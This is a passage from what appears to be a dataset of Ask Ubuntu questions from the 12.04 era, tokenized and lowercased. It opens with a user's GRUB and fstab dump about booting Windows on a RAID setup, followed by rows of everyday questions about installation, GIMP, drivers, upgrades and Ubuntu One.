set linux_gfx_mode=text fi else set linux_gfx_mode=text fi else set linux_gfx_mode=keep fi else set linux_gfx_mode=text fi export linux_gfx_mode if [ `` $ linux_gfx_mode '' ! = `` text '' ] ; then load_video ; fi menuentry 'ubuntu , with linux 3.2.0-24-generic-pae ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail gfxmode $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root= ' ( /dev/mapper/isw_chjbfeec_dougraid3 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root bbab868a-ea53-4be3-ba7d-2737fe6cb24c linux /boot/vmlinuz-3.2.0-24-generic-pae root=uuid=bbab868a-ea53-4be3-ba7d-2737fe6cb24c ro quiet splash $ vt_handoff initrd /boot/initrd.img-3.2.0-24-generic-pae } menuentry 'ubuntu , with linux 3.2.0-24-generic-pae ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod gzio insmod part_msdos insmod ext2 set root= ' ( /dev/mapper/isw_chjbfeec_dougraid3 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root bbab868a-ea53-4be3-ba7d-2737fe6cb24c echo 'loading linux 3.2.0-24-generic-pae ... ' linux /boot/vmlinuz-3.2.0-24-generic-pae root=uuid=bbab868a-ea53-4be3-ba7d-2737fe6cb24c ro recovery nomodeset echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.2.0-24-generic-pae } submenu `` previous linux versions '' { menuentry 'ubuntu , with linux 3.2.0-23-generic-pae ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail gfxmode $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root= ' ( /dev/mapper/isw_chjbfeec_dougraid3 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root bbab868a-ea53-4be3-ba7d-2737fe6cb24c linux /boot/vmlinuz-3.2.0-23-generic-pae root=uuid=bbab868a-ea53-4be3-ba7d-2737fe6cb24c ro quiet splash $ vt_handoff initrd /boot/initrd.img-3.2.0-23-generic-pae } menuentry 'ubuntu , with linux 3.2.0-23-generic-pae ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod gzio insmod part_msdos insmod ext2 set root= ' ( /dev/mapper/isw_chjbfeec_dougraid3 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root bbab868a-ea53-4be3-ba7d-2737fe6cb24c echo 'loading linux 3.2.0-23-generic-pae ... ' linux /boot/vmlinuz-3.2.0-23-generic-pae root=uuid=bbab868a-ea53-4be3-ba7d-2737fe6cb24c ro recovery nomodeset echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.2.0-23-generic-pae } } # # # end /etc/grub.d/10_linux # # # # # # begin /etc/grub.d/20_linux_xen # # # # # # end /etc/grub.d/20_linux_xen # # # # # # begin /etc/grub.d/20_memtest86+ # # # menuentry `` memory test ( memtest86+ ) '' { insmod part_msdos insmod ext2 set root= ' ( /dev/mapper/isw_chjbfeec_dougraid3 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root bbab868a-ea53-4be3-ba7d-2737fe6cb24c linux16 /boot/memtest86+.bin } menuentry `` memory test ( memtest86+ , serial console 115200 ) '' { insmod part_msdos insmod ext2 set root= ' ( /dev/mapper/isw_chjbfeec_dougraid3 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root bbab868a-ea53-4be3-ba7d-2737fe6cb24c linux16 /boot/memtest86+.bin console=ttys0,115200n8 } # # # end /etc/grub.d/20_memtest86+ # # # # # # begin /etc/grub.d/30_os-prober_proxy # # # menuentry `` windows 7 ( loader ) ( on /dev/mapper/isw_chjbfeec_dougraid1 ) '' -- class windows -- class os { insmod part_msdos insmod ntfs set root= ' ( sda , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root c89c73d19c73b910 chainloader +1 } # # # end /etc/grub.d/30_os-prober_proxy # # # # # # begin /etc/grub.d/40_custom # # # # this file provides an easy way to add custom menu entries . simply type the # menu entries you want to add after this comment . be careful not to change # the 'exec tail ' line above . # # # end /etc/grub.d/40_custom # # # # # # begin /etc/grub.d/41_custom # # # if [ -f $ prefix/custom.cfg ] ; then source $ prefix/custom.cfg ; fi # # # end /etc/grub.d/41_custom # # # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- ====================== isw_chjbfeec_dougraid5/etc/fstab : ======================= -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 /dev/mapper/isw_chjbfeec_dougraid5 / ext4 errors=remount-ro 0 1 /dev/mapper/isw_chjbfeec_dougraid6 none swap sw 0 0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- ========== isw_chjbfeec_dougraid5 : location of files loaded by grub : =========== gib - gb file fragment ( s ) = boot/grub/core.img 1 = boot/grub/grub.cfg 1 = boot/initrd.img-3.2.0-23-generic-pae 2 = boot/initrd.img-3.2.0-24-generic-pae 2 = boot/vmlinuz-3.2.0-23-generic-pae 1 = boot/vmlinuz-3.2.0-24-generic-pae 1 = initrd.img 2 = initrd.img.old 2 = vmlinuz 1 = vmlinuz.old 1 ======================== unknown mbrs/boot sectors/etc : ======================== unknown bootloader on sda1 unknown bootloader on sda2 unknown bootloader on sda3 =============================== stderr messages : =============================== xz : ( stdin ) : compressed data is corrupt xz : ( stdin ) : compressed data is corrupt hexdump : /dev/sda1 : no such file or directory hexdump : /dev/sda1 : no such file or directory hexdump : /dev/sda2 : no such file or directory hexdump : /dev/sda2 : no such file or directory hexdump : /dev/sda3 : no such file or directory hexdump : /dev/sda3 : no such file or directory xz : ( stdin ) : compressed data is corrupt awk : cmd . line:36 : math support is not compiled in awk : cmd . line:36 : math support is not compiled in awk : cmd . line:36 : math support is not compiled in awk : cmd . line:36 : math support is not compiled in awk : cmd . line:36 : math support is not compiled in awk : cmd . line:36 : math support is not compiled in awk : cmd . line:36 : math support is not compiled in awk : cmd . line:36 : math support is not compiled in awk : cmd . line:36 : math support is not compiled in awk : cmd . line:36 : math support is not compiled in how we can see the windows part at grub is : menuentry `` windows 7 ( loader ) ( on /dev/mapper/isw_chjbfeec_dougraid1 ) '' -- class windows -- class os { insmod part_msdos insmod ntfs set root= ' ( sda , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root c89c73d19c73b910 chainloader +1 } i tried a lot of combinations at the line : set root= ' ( sda , msdos1 ) ' , but no success i tried to change uuid to the /dev/mapper/isw_chjbfeec_dougraid2 uuid , but the grub reports a error . i dont know what to do now . i really need to boot my windows partition . someone knows what to do ? thanks ... ... ..
132897	is there a program that adjusts the screen color depending on the time ?	what is the name of the program that tints the screen color depending on the time ?
132901	netdisco for ubuntu server	has anyone had luck installing netdisco through apt-get ? i could n't get it to work . i tried netdisco-frontend , netdisco-backend , netdisco-common , netdisco-installer . i used the command : sudo apt-get install netdisco-common netdisco-frontend netdisco-backend everything installed fine , but i ca n't get it running . it does n't seem to have install to /usr/local/netdisco/ . i have looked all over the internet and there does n't seem to be an easy way to do this . i use server 12.04 . thanks !
132905	missing operating system when installing 12.04 from usb	i wanted to upgrade my 10.04 pc to 12.04 . towards the end of the upgrade , i made the foolish mistake of thinking `` hibernate '' on the system menu meant `` sleep '' , when it reality it seemed to shut down the computer . when the computer restarted it exploded with the weirdest errors , cumulating in `` plymouth main process ( 56 ) killed by segv signal '' . so since i did n't have any files i cared about on the computer , i decided to go ahead and clean install 12.04 . i used unetbootin on my macbook air ( no cd drive ) to install 12.04 via a downloaded dmg , and tried to boot up the computer to start the installation . i ended up with a `` missing operating system '' error . what am i doing wrong ? i 've read that i need to make the usb drive `` bootable '' , but does n't unetbootin take care of that ? it is a samsung usb drive , but i 've reformatted and wiped it so there 's no u3 partition .
132907	moving a pane in libreoffice back to the main window	i accidentally moved a pane in libreoffice from it 's nice docked position to a new window . now i ca n't move back it . as you can see , the slide pane is floating as it 's own window and not docked like tasks , etc .
132908	ubuntu 12.04 installation with usb	i recently got a dell ultrabook and was trying to install ubuntu on it . i was able to successfully download the .iso file onto my usb drive using universal-usb-installer , and was then able to load the ubuntu installer . however , when i chose the option to `` install windows 7 and ubuntu side-by-side '' , the computer restarted and then opened up windows instead of continuing to install ubuntu . then , i tried to change the order in which my computer chooses to boot ... booting from the hard drive was ahead of booting from a usb drive , so i switched that . then i tried to install ubuntu again , and the the same thing happened ... i chose `` install windows 7 and ubuntu side-by-side '' and the computer restarted , and instead of continuing to install ubuntu , i got prompted to begin the ubuntu installation process ( or to `` try '' ubuntu ) . any suggestions ? ? ? also , i tried to the `` windows installer '' by downloading wubi.exe that was supposed to be quick and easy ... but then i was only allowed to choose a 30 gb installation size ( the partition that windows is on has currently 92.95 gb with 65.21 gb in free space , according to windows ' computer management ) . i 'd like more than 30 gb on ubuntu , and i do n't see why it 's not allowing me to choose more than 30gb ...
132909	is there a terminal command to search for additional drivers in 12.04 ?	whenever i try to run the `` additional drivers '' application , it searches for about 15 minutes and then crashes . is there another way to search for additional drivers or a non-gui application that could carry out the same purpose ?
132913	problem while upgrding from 11.10 to 12.04	i am upgrading from 11.10 to 12.04 using the update manager . with about 35 minutes left in the `` installing '' phase of the upgrade , the screen went black , mouse and keyboard dead . do i need to make a new installation from an iso cd ? if yes , should i use the 12.04 issue of ubuntu .
132918	need help installing plugin from source with make	i am running ubuntu 12.04 x64 desktop dvd , and i have installed gimp 2.6.12 from the ubuntu software center . i need a plug-in for batch resizing of images , and found one . i downloaded the plug-in , extracted in my downloads folder . the read-me says to make and make install . i tried `` make '' via the terminal and i am getting an error . the plugin i am trying to install is http : //www.alessandrofrancesconi.it/projects/bimp/ . the full output in the terminal from my make command to the end is ( sorry total noob for gnu/linux and stackexchange here and do n't know how to properly insert code ) : aknewhope @ jordandesktop : ~/downloads $ make make : gimptool-2.0 : command not found gcc -o ./bin/bimp -wall -wno-unused-variable -wno-pointer-sign -wno-parentheses src/*.c src/manipulation-gui/*.c -dgimp_disable_deprecated src/bimp-gui.c:7:21 : fatal error : gtk/gtk.h : no such file or directory compilation terminated . src/bimp-manipulations-gui.c:5:21 : fatal error : gtk/gtk.h : no such file or directory compilation terminated . src/bimp-manipulations.c:7:21 : fatal error : gtk/gtk.h : no such file or directory compilation terminated . src/bimp-operate.c:10:21 : fatal error : gtk/gtk.h : no such file or directory compilation terminated . src/bimp.c:25:26 : fatal error : libgimp/gimp.h : no such file or directory compilation terminated . src/manipulation-gui/gui-changeformat.c:2:21 : fatal error : gtk/gtk.h : no such file or directory compilation terminated . src/manipulation-gui/gui-color.c:1:21 : fatal error : gtk/gtk.h : no such file or directory compilation terminated . src/manipulation-gui/gui-crop.c:1:21 : fatal error : gtk/gtk.h : no such file or directory compilation terminated . src/manipulation-gui/gui-fliprotate.c:1:21 : fatal error : gtk/gtk.h : no such file or directory compilation terminated . src/manipulation-gui/gui-rename.c:3:21 : fatal error : gtk/gtk.h : no such file or directory compilation terminated . src/manipulation-gui/gui-resize.c:1:21 : fatal error : gtk/gtk.h : no such file or directory compilation terminated . src/manipulation-gui/gui-sharp.c:1:21 : fatal error : gtk/gtk.h : no such file or directory compilation terminated . src/manipulation-gui/gui-userdef.c:3:21 : fatal error : gtk/gtk.h : no such file or directory compilation terminated . src/manipulation-gui/gui-watermark.c:3:21 : fatal error : gtk/gtk.h : no such file or directory compilation terminated . make : *** [ make ] error 1
132921	ubuntu 11.10 - how can i install xserver-xorg-input-evtouch ? apt-cache search do not show up	i have elo touch screen , where i have been trying for long long time , which is failing . i now figure out that i have to use xserver-xorg-input-evtouch , which is the only one worked for many others . but while installing i do not find it under 11.10 and my system is 64-bit . ( evtouch installation for dual head 1 normal monitor , second one as touch screen , where cursor orientation is breaking . )
132922	initramfs unable to find a medium containing a live file system	i have a r100 toshiba external cd-rom using pci card and usb floppy . i have tried to install xp to see if it works any different and to do that i have to use recovery disks for the toshiba to make a x : drive and then use winnt to put files on hard drive and install from there other wise if it tries from the cd i get a blue screen . so is there anyway to do something similar to ubuntu ? i have tried older versions and slow burns of the image .
132926	rhythmbox ipod issues ?	basically , when i try and drag a song from my library to any one of my ipods ( classic ( 2.0.4 mac ) , touch ( 3.1.2 . ( 7d11 ) ) and shuffle ) , nothing happens . it would appear that everything went ok , but when i go to the ipod 's library , the song is not there . when trying to transfer the file , there is no error etc . to indicate what went wrong , and so i ca n't file a bug report on launchpad etc . does anyone know what could be wrong ? edit : i forgot to add that i 'm running a 64-bit install of ubuntu 12.04lts and that amarok and gtkpod do n't even recognise that any devices are plugged in . thanks .
132930	menu bar shows the word `` time '' where current time should be	i just upgraded from 10.10 to 12.04 . a picture says a thousand words in this case . here 's a g+ post with a screenshot of my menu bar : i 've tried messing with the clock settings -- -specifying a time zone , un-checking & re-checking `` show a clock in the menu bar '' , and asking that `` weekday '' and `` date and month '' be displayed with the time . nothing seems to work . any ideas how i can get the actual clock to display instead of the word `` time '' ? thanks . requested system information : jason @ pinot : ~ $ gsettings get com.canonical.indicator.datetime custom-time-format ' % l : % m % p'
132931	usb mouse not recognized	just installed ubuntu 12.04 32 bit through wubi on my asus a52f . now i ca n't get my usb mouse working . i made sure to update the xserver-xorg-input-mouse driver through software center , trackpad is working fine jesse @ ubuntu : ~ $ xsetpointer -l | grep pointer 2 : `` virtual core pointer '' [ xpointer ] 4 : `` virtual core xtest pointer '' [ xextensionpointer ] 12 : `` etps/2 elantech touchpad '' [ xextensionpointer ]
132935	how to load ubuntu with windows 8 boot loader	i have a toshiba laptop which came with windows 7 . i partitioned my hard drive and am now triple booting windows 7 , windows 8 consumer preview ( installed first ) , ubuntu 12.04 ( installed second ) . i would like to be able to use windows 8 boot loader ( if possible ) to select between the three os 's . currently i start my pc and grub2 loads ( i believe this is the name , purple ubuntu boot loader screen ? ) where i can choose between ubuntu or windows 8 loader ( not windows 7 ) if i select windows 8 loader it then starts windows 8 boot loader where i can choose from windows 7 or 8 ( not ubuntu ) . i need a way to first make windows 8 loader recognize my ubuntu partition then second , successfully uninstall grub .
132939	i can not enter my password when using sudo to install sophos av for linux	i can not type my password as shown below . after successfully unlocking root account in ubuntu 12.04 lts . saintmichael @ ubuntu : ~ $ sudo usage : sudo [ -d level ] -h | -k | -k | -v usage : sudo -v [ -akns ] [ -d level ] [ -g groupname| # gid ] [ -p prompt ] [ -u user name| # uid ] usage : sudo -l [ l ] [ -akns ] [ -d level ] [ -g groupname| # gid ] [ -p prompt ] [ -u user name ] [ -u user name| # uid ] [ -g groupname| # gid ] [ command ] usage : sudo [ -abehknps ] [ -c fd ] [ -d level ] [ -g groupname| # gid ] [ -p prompt ] [ -u user name| # uid ] [ -g groupname| # gid ] [ var=value ] [ -i|-s ] [ < command > ] usage : sudo -e [ -akns ] [ -c fd ] [ -d level ] [ -g groupname| # gid ] [ -p prompt ] [ -u user name| # uid ] file ... saintmichael @ ubuntu : ~ $ sudo ./sophos-av/install.sh [ sudo ] password for saintmichael :
132940	finger print scanner driver lenovo v570 ?	well since i recently chucked windows7 from my laptop , i have been wanting to get my fingerprint scanner to work . i have had very little success in finding any good info on this issue . i am almost convinced that there are no drivers for the scanner . i like using this scanner for logins , yes i am lazy like that , i do enough typing as it is . has anyone had any success installing working drivers for finger print scanner ? this is a lenovo ideapad v570 - ( do not know the other numbers ) , i5 core intel , 6 gigs , and in my opinion a wonderful linux machine . here is the lsusb output : - rabbit @ lenovo-v570 : ~ $ - bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub - bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub - bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub - bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub - bus 001 device 003 : id 8087:07d7 intel corp. - bus 001 device 004 : id 0bda:58ea realtek semiconductor corp. - bus 002 device 003 : id 0d62:8001 darfon electronics corp. - **bus 002 device 004 : id 1c7a:0603 lightuning technology inc.** - bus 002 device 005 : id 0bda:0139 realtek semiconductor corp. 2nd from the bottom is the problem . edit : also it seems that there are no linux drivers out for this scanner from what i gather , the model of scanner in the thinkpads are different than those in the ideapads . i even checked on ubuntu 's catalog , they are all thinkpads , not ideapads , and the other thing the company lightuning was bought out by egistec , they seem to have put very little effort into making a linux driver for this hardware .
132946	gimp : editing .psd file , saving single layer as png	i 'm reading a psd file with gimp , now i want to save a single layer into a png file , but when i right click on the layer , there 's no such option available .
132947	with gimp , how do i hide all layers except the current one ?	is there a way to hide all other layers when you click on the 'eye ' symbol ? it 's like what macormedia flash does , display only the layer that you click on , all else is hidden . is there a shortcut key ?
132952	upgrading to 12.04 from 11.10 ; can not calculate the upgrade ?	so i 'm trying to upgrade from onereic to pangolin using the update manager . fine . except that i get this error in the `` setting new software channels '' phase ; could not calculate the upgrade an unresolvable problem occurred while calculating the upgrade : e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages . this can be caused by : * upgrading to a pre-release version of ubuntu * running the current pre-release version of ubuntu * unofficial software packages not provided by ubuntu if none of this applies , then please report this bug using the command 'ubuntu-bug update-manager ' in a terminal . i do have a lot of ppas , but i 've disabled all of them . someone told me to use ppa-purge on all of them , but i do n't think i 'm doing it correctly . remember , i 've successfully upgraded to 11.10 from 11.04 with all of these ppas activated . any tips ?
132954	general linux question : what is the best way to add another distro to a dual booting system ?	i 'm currently running a bare bones windows xp install and ubuntu . ubuntu being the primary os . i am wanting to add a 3rd os that is another linux distro jolios . currently i have 2 partitions 16g for windows , 90 something for ubuntu . i 'm assuming i will have to edit the ubuntu partition to add jolios , but how will this affect my boot and is it even possible to run 2 linux os 's off the same partition ?
132955	wubi external hard drive	is there a real risk / issues when installing a simple wubi on an external usb drive . i must stress that the drive is not empty - it is currently ntfs ( winxp ) and has documents on it .. as i understand , wubi acts like a `` virtualized '' disk , meaning that it should not effect the other folders in the disk - as it writes itâ´s own `` image '' in a folder ... is that correct ? ( please do not answer that it would be better doing on an empty disk - it is not currently an option for me .. )
132958	ubuntu software centre - confusion with installing software - adobe flash problems - 12.04	i am a newcomer to ubuntu 12.04 , and i 've encountered some problems or confusion with using the os , particularly with ubuntu software center ( which was one of the reasons i got ubuntu linux ) . when i go into the software center i find it confusing as to how to download and install a program . for example , audacity , does n't not have an `` install '' button , but a `` use this source '' from an apparent `` universe '' source ( i do n't know what this means ) . i click it , it shows in the `` progress '' bar , and then disappears . i look into the `` history '' and it does not mention anything being installed . i go into the search and it 's not installed as an application ( i do n't even know where it is on my computer ! ) . this happens for most apps i want , including chromium , etc . i used to get a `` check your internet connection '' message , but i have an internet connection ( moxilla firefox runs , as does update manager ) albeit a little slow . also , i do n't have adobe flash and i have the same problem as above when trying to install it , and i read that it does n't even work for ubuntu 12.04 . i also want to install synaptic , but i ca n't install anything at all . basically , to me , ubuntu is useless without the software center . please help , and thanks for your time . troubled linux user ( p.s . i am not very experienced as a programmer and understand terminal that well , but i can copy and paste commands - i already tried sudo apt-get update )
132961	how do i get the bugs i 'm seeing in empathy addressed ?	since upgrading i 'm seeing some extremely buggy behavior . i realize that its an ongoing software project and i do n't expect everything to be perfect from day one but it 's getting to the point that i would downgrade except for the apparent difficulty involved in that . i get daily or so crashes from some background process telepathy ... something . when i hit an intermittent internet connection i loose connectivity from all empathy chat services and ca n't regain them without rebooting . it occasionally prompts me to set up my accounts but selecting accounts/f4 does n't bring up any windows . also occasionally windows that disappear into minimized mode and are quite difficult to bring back . now i 'm not against reporting bugs , but i feel like - besides clicking the `` submit crash info '' button over and over - i want to dig in a bit more . i would like to submit specifics t. i 'm sure there are forums , logs to submit , and people to pester . where do i start ?
132962	why does ubuntu one persistently go to a `disabled` state ? `	my backup tar archive is 0.5 gb . the upload rate is limited so synching to the cloud i estimate to take 3 hours . the upload rate is difficult to change since the internet service is provided by the landlord . initially i expected ubuntu one to keep the computer awake the whole 3 hours . my settings > power was set to 5 minutes . when i left the computer unattended and returned i saw that ubuntu one was disabled so i re-enabled and i changed settings > power to do n't suspend . many hours later i returned to see that ubuntu one was again disabled so i re-enabled . it did not indicate the synch had completed and this is unexpected . somehow i managed to get it to report that the synch was completed , perhaps by closing the application and re-opening it . how do i stop this application from going to a disabled state ?
132965	how do i boot into single-user mode from grub ?	after changing a few lines in xorg.conf , i can no longer boot ubuntu ( i assume it breaks when trying to load up x ) , so i need a way to boot into a single-user mode . however , there seems to be zero guides on the internet how to do it , because they all assume i can actually edit files on my computer , and i obviously ca n't . so how do i load ubuntu in single-user mode ? when i turned off splash , i figured out the problem : whenever ubuntu ca n't load x server due to some error , it switches to tty1 and waits for the prompt , but does n't turn off the splash .
132967	how do i remove or uninstall deluge ?	i upgraded to 12.04 and deluge broke . i want to remove it and then add it again . how do i remove deluge ? tried : searching the ubuntu software centre failed : the button reads `` install '' ( but it 's already installed ! ) tried : sudo apt-get remove -- purge deluge failed : output read removing deluge ... but i can still find it when i search my dash
132969	how to format the ubuntu partitions from windows xp ?	how to format the ubuntu partitions from windows xp ? my ubuntu is broken and ca n't log in . my dual booting windows xp is working fine . i want to delete ubuntu partitions from windows xp and reinstall . how to delete the partitions ?
132973	how do i get ubuntu one to report the synching is up-to-date ?	my backup tar archive is 0.5 gb . the upload rate is limited so synching to the cloud i estimate to take 3 hours . the upload rate is difficult to change since the internet service is provided by the landlord . initially i expected ubuntu one to keep the computer awake the whole 3 hours . my settings > power was set to 5 minutes . when i left the computer unattended and returned i saw that ubuntu one was disabled so i re-enabled and i changed settings > power to do n't suspend . many hours later i returned to see that ubuntu one was again disabled so i re-enabled . it did not indicate the synch had completed and this is unexpected . somehow i managed to get it to report that the synch was completed , perhaps by closing the application and re-opening it . i tested with a smaller file of 2 mb and find that this is not a problem . how do i get it to report completion of large files without closing and reopening ?
132977	how to get global application menu for gvim ?	gvim does not have a global menu ( appmenu / application menu ) in 12.04 , and when starting gvim from a terminal , the following warning appears in the terminal after 25 seconds : ** ( gvim:20320 ) : warning ** : unable to create ubuntu menu proxy : timeout was reached how to fix this ?
132980	gimp : auto resize canvas size to image size	i copied a layer from another image file , and created a empty canvas to hold the image copied . but when i create the new canvas , the default size was as same as the original canvas , where i copied this layer . how can i resize the canvas size to exactly the size of the image i copied ? as you can see , it 's already under selection , maybe there 's some way out from here . or if anyone knows how to set the canvas size from layer , when you create the empty cavnas , it 's a neat solution as well .
132984	installation size enlightenment	looking here , why does the `` installation size : '' differ ? what differs an installation size of 10gb to 30gb ?
132986	grub installation in fatal error in jbod disk setting	so i have this jbod drive , with two different partition partition a is for windows while b i would like to have ubuntu 12.04 in it however at the end of ubuntu installation , there is an error stating grub failed to install and a fatal error . i was given option as to where to install the grub , and i tried them all and all giving me the same fatal error here is one example of options given /dev/mapper/nvidia_eeffaace1 to my knowledge grub is supposed to be installed in /dev/sda but in jbod configuration , both sda and sdb isnt available please help me and thank you
132992	change default terminal directory	i 'm not sure how i did it , but i apparently changed the default directory for terminal . whenever i open it , rather than reading username @ computer : ~ $ , it reads username @ computer : ~directory $ i have no idea what command to use to change this ... does anyone have any ideas ?
132994	how to set up bazaar server on ubuntu server	how do you set up a bazaar server on ubuntu server ? i have home server running ubuntu server 12.04 lts i want to use as a bazaar central server . how do i do that ? ( create repository ( if not the same ) , open ports for listening , create users ... ) . edited i found a blog that has stuff needed for a server to be started . but ... how do you limit rights for users ? give some users rights to upload , others - download and etc . here is the blog : http : //zeth.net/post/366/
132995	12.04 scan mode does not work	my hp psc-2400-series device still prints but does not longer scan since i switched to version 12.04 . i had no problem with scanning under 11.10 . when trying to scan the software ( impress or writer ) always crashes or simply nothing happens . thanks for a hint !
132997	how to install ubuntu on my mid a10 tablet	i just bought this mid a10 tablet here in china and i 'll like to know how to install ubuntu on it .
133000	is there a global shortcut to access the application preferences of an active application ?	the application preferences in the menu options do not show a shortcut for fast access . i 'd like to have a unified shortcut to access the applications preferences in any application . how can i get a shortcut for the application preferences of the active application ?
133002	am i using integrated or discrete graphics ?	my work station is a macbook pro which has ... integrated graphics : intel hd 3000 discrete graphics : radeon xxxx ... i have installed drivers for the discrete graphics right after installation . during normal usage , i notice that the calculated time for the remaining battery life frequently changes significantly - therefore i assume that ubuntu 12.04 switches between the integrated and discrete graphics . however , the indicated battery life only changes between 1:30 and 3 hours , which is significantly less than the 5-6 hours i get when using osx 10.7.x . is all of this this due to an overhead caused by 'bad ' drivers that i have to expect - or is it just that i 'm using discrete graphics all the time ? how can check what graphics i 'm currently using ?
133007	what options exists to sleep the display ?	i want to sleep my display - just the display , not the computer . i 've been looking in compiz for an option like `` hot corner to sleep display '' - something that i 've setup in osx 10.7 . how can i accomplish something similar in ubuntu 12.04 ? ( shortcut , command in terminal , ... )
133009	how to make partition mounting permanent ?	i have a few partitions on my pc , for example for movies , so when i reinstall the operating system they remain untouched . when installing xubuntu 12.04 i forgot to set mounting points for these partitions . now i can mount and unmount them in thunar manually as if they were usb drives , but that is for the session only , after i restart my computer i have to do it again . i know that i could just edit /etc/fstab but i 'm not really a power user of linux , and i do n't want to mess things up , especially with these partitions . is there a way ( preferably with a program that has a gui ) to just make these manual mounts permanent ? and if there is not , then how could i find out what to write for them into the fstab to not mess up things ?
133011	set default language to english ( us ) in 12.04	i accidentally installed canadian english instead of us english when i did my install . how can i set this back ? when i go to system settings > language support english and english ( canada ) are available , but english ( united states ) , along with all other english variants , are greyed out . `` install/remove languages '' below does not have the granularity lower than english , so i ca n't select a country . how can i install us english ?
133016	unable to unmount an external usb hdd	in ubuntu 12.04 , when i try to unmount an external usb hdd in nautilus with the option `` safely remove '' , the hdd is effectively unmounted , but after 10 seconds it is automatically remounted again . this is happened for every usb hdd i have tried .
133023	getting `` http error 500 ( internal server error ) '' while installing codeigniter	i have no idea why this installation is giving me this problem but for some reason my lamp installation will not show the codeigniter welcome page . at first i was getting : 403 forbidden so i changed the permissions of the /var/www/ folder but now i get : http error 500 ( internal server error ) : an unexpected condition was encountered while the server was attempting to fulfil the request . i had everything working fine before i upgraded to 12.04 but since then , everything has fallen apart . i want the /var/www/ folder set up in a way that i can install several folders with different frameworks and content management systems for my different projects . i just need a little help getting this server issue worked out .
133025	startup manager in ubuntu 12.04	i am unable to find start up manager in the repos for ubuntu 12.04 amd64 . i use a core i3 2nd generation with 6gb ram . i did a clean install of 12.04 amd64 . has start up manager been withdrawn in 12.04 ? thanks in advance . ragv
133029	it starts the boot image ( usplash ) kde/lubuntu in ubuntu 12.04	when installing kde / lubuntu in ubuntu 12.04 system startup has changed ( artwork ) . how i can regain ubuntu boot image files without uninstalling lubuntu ? ( because i have lubuntu you ever apatece i use it ) .
133030	overheating and reboot with ubuntu 11.10 and 12.04 on thinpad t500	symptoms are high temperature when high usage of cpu , with reboot when more than 100째c ( information extract from acpitz/1 entry ) . i found a bug entry in launchpad about wrong fan speed but even if i force the fan to max ( see the bug description of the launchpad entry ) the computer is still rebooting after one minute of high cpu usage . but i 'm starting to suspect several bugs in my case . my battery has a lifetime of 2 to 3 hours , half of what i had before ubuntu 11.10 ( ~5 hours ) . so it maybe related to aspm bug , but even with recent updates of the kernel i have still the problem . i 've tried multiple kernel startup switchs fixup found with ubuntu 11.10 but nothing really changed . abot aspm , dmesg returns : $ dmesg | grep aspm [ 0.160288 ] acpi fadt declares the system does n't support pcie aspm , so disable it maybe i need to try again with 12.04 ? two last things : - i can not open my computer to remove possible dust ( computer owned by my company , guaranty yada yada ... ) - i saw somewhere possible gpu overheating ( can not found the link ) , anyone has such experience ? any hint , clue or proposal welcomes ... update 1 i 've also run 'powertop ' and saw several other things : first , turbo mode of the processor is always running 25 % of the time : package | cpu 0 turbo mode 24.4 % | turbo mode 21.7 % 2.81 ghz 1.8 % | 2.81 ghz 1.6 % 2.14 ghz 0.9 % | 2.14 ghz 0.9 % 1.60 ghz 3.3 % | 1.60 ghz 3.3 % 800 mhz 57.5 % | 800 mhz 55.2 % idle 12.1 % | idle 17.4 % | cpu 1 | turbo mode 24.1 % | 2.81 ghz 1.8 % | 2.14 ghz 0.9 % | 1.60 ghz 3.2 % | 800 mhz 54.5 % | idle 15.5 % second , tunables tab prints a lot of devices with important runtime ( no economy energy mode ? ) : bad enable sata link power management for /dev/sda bad nmi watchdog should be turned off bad power aware cpu scheduler bad vm writeback timeout bad enable audio codec power management bad autosuspend for usb device fingerprint sensor [ 4-1 ] bad autosuspend for usb device usb receiver ( logitech ) bad autosuspend for usb device android phone ( htc ) bad runtime pm for pci device intel corporation mobile 4 series chipset memory controller hub bad runtime pm for pci device ricoh co ltd r5c832 ieee 1394 controller bad runtime pm for pci device intel corporation mobile 4 series chipset mei controller bad runtime pm for pci device intel corporation 82567lf gigabit network connection bad runtime pm for pci device intel corporation 82801i ( ich9 family ) usb uhci controller # 4 bad runtime pm for pci device intel corporation 82801i ( ich9 family ) usb2 ehci controller # 2 bad runtime pm for pci device intel corporation 82801i ( ich9 family ) hd audio controller bad runtime pm for pci device ricoh co ltd xd-picture card controller bad runtime pm for pci device ricoh co ltd r5c592 memory stick bus host adapter bad runtime pm for pci device ricoh co ltd r5c822 sd/sdio/mmc/ms/mspro host adapter bad runtime pm for pci device intel corporation mobile 4 series chipset integrated graphics controller bad runtime pm for pci device intel corporation ultimate n wifi link 5300 bad runtime pm for pci device ricoh co ltd rl5c476 ii bad runtime pm for pci device intel corporation 82801i ( ich9 family ) usb uhci controller # 6 bad 